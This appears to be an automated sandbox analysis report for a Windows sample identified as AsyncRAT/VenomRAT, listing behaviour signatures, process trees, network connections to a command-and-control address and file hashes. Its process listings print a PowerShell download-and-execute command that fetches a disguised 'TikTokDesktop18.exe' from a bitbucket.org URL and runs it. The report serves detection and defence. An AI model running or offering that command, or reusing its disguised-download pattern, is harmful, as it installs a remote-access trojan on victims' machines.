Analysis Overview
SHA256
017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1
Threat Level: Known bad
The file 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Asyncrat family
VenomRAT
Venomrat family
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-28 21:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 21:59
Reported
2024-11-28 22:01
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat
| MD5 | 1904675eec0f302424c4bde0956dab54 |
| SHA1 | 267c3174e35e0e2a7d104f98b3326f313f2e464e |
| SHA256 | 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6 |
| SHA512 | fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3 |
memory/2720-6-0x000007FEF646E000-0x000007FEF646F000-memory.dmp
memory/2720-7-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2720-9-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp
memory/2720-8-0x0000000001DB0000-0x0000000001DB8000-memory.dmp
memory/2720-10-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp
memory/2720-11-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp
memory/2720-12-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-28 21:59
Reported
2024-11-28 22:02
Platform
win10v2004-20241007-en
Max time kernel
102s
Max time network
119s
Command Line
Signatures
AsyncRat
Asyncrat family
VenomRAT
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Venomrat family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2080 set thread context of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 16.15.178.155:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.178.15.16.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | tcp | |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | tcp | |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | tcp | |
| RU | 212.15.49.155:4449 | tcp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| RU | 212.15.49.155:4449 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat
| MD5 | 1904675eec0f302424c4bde0956dab54 |
| SHA1 | 267c3174e35e0e2a7d104f98b3326f313f2e464e |
| SHA256 | 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6 |
| SHA512 | fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3 |
memory/4408-2-0x00007FFE71FB3000-0x00007FFE71FB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snvlrfet.khw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4408-8-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
memory/4408-13-0x00000220FF450000-0x00000220FF472000-memory.dmp
memory/4408-14-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
memory/4408-18-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
| MD5 | e619fff5751a713cf445da24a7a12c94 |
| SHA1 | 9fc67a572c69158541aaaab0264607ada70a408c |
| SHA256 | 11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9 |
| SHA512 | 07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae |
memory/2080-22-0x000000007411E000-0x000000007411F000-memory.dmp
memory/2080-23-0x00000000005C0000-0x0000000000646000-memory.dmp
memory/2080-24-0x0000000002950000-0x0000000002956000-memory.dmp
memory/2080-25-0x000000000ABE0000-0x000000000B10C000-memory.dmp
C:\Users\Admin\AppData\Roaming\gdi32.dll
| MD5 | 8d662564d514751028c65d96c696271f |
| SHA1 | 8e27943b7b901a808d39a7ee6977e1d3769a15fb |
| SHA256 | 86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b |
| SHA512 | 0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef |
memory/4500-32-0x0000000000780000-0x00000000007AC000-memory.dmp
memory/4500-34-0x0000000005670000-0x0000000005C14000-memory.dmp
memory/4500-36-0x0000000005370000-0x0000000005402000-memory.dmp
memory/4500-37-0x0000000005350000-0x000000000535A000-memory.dmp